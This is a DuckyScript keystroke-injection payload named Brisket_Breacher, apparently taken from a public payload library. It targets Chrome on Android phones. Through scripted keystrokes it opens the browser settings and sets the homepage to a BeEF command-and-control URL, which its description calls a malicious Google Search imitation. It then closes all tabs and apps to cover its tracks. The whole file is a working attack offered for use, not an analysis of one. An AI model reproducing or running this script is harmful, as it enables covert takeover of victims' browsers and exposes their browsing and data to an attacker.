Path: blob/master/payloads/library/mobile/Android/Brisket_Breacher/payload.txt
2971 views
REM TITLE: Brisket_Breacher1REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)2REM TARGET OS: Android mobile device/Google Chrome (tested on Samsung S24 FE | One UI V7.0 | Android V15)3REM DESCRIPTION: Brisket_Breacher is DuckyScript payload that targets the Android mobile device Google Chrome browser utilizing the Browser Exploitation Framework (BeEF). It replaces the homepage of the browser with a malicious Google Search imitation homepage that connects to a control and command server, allowing the attacker to have control over the browser. See README.md4REM REQUIREMENTS: See README.md56DEFINE #BeEF_URL https://BeEF_C2_URL78REM Begin attack:9ATTACKMODE HID10DELAY 10001112REM Opening Google Chrome:13GUI f14DELAY 40015STRINGLN chrome16DELAY 20017ENTER18DELAY 5001920REM Opening new tab to ensure proper default Chrome environment to execute payload properly:21CTRL t22DELAY 30023SHIFT TAB24DELAY 20025ENTER26DELAY 3502728REM Navigating to Homepage settings:29REPEAT 11 DOWNARROW30ENTER31DELAY 35032REPEAT 10 DOWNARROW33ENTER3435REM Setting BeEF C2 URL as default homepage:36DELAY 25037REPEAT 4 TAB38DELAY 25039CTRL a40DELAY 25041STRINGLN #BeEF_URL42DELAY 2504344REM Navigating back to original homepage and accessing tabs menu:45ESC46DELAY 10047ESC48DELAY 25049SHIFT TAB50DELAY 25051DOWNARROW52DELAY 10053UPARROW54DELAY 30055ENTER5657REM Closing all tabs:58DELAY 35059REPEAT 4 TAB60DELAY 35061ENTER62DELAY 35063REPEAT 2 DOWNARROW64DELAY 25065ENTER66DELAY 35067TAB68DELAY 10069TAB70DELAY 10071ENTER72DELAY 2007374REM Closing applications (including browser) and returning to home screen:75INJECT_MOD76GUI TAB77DELAY 30078REPEAT 2 DOWNARROW79DELAY 15080ENTER818283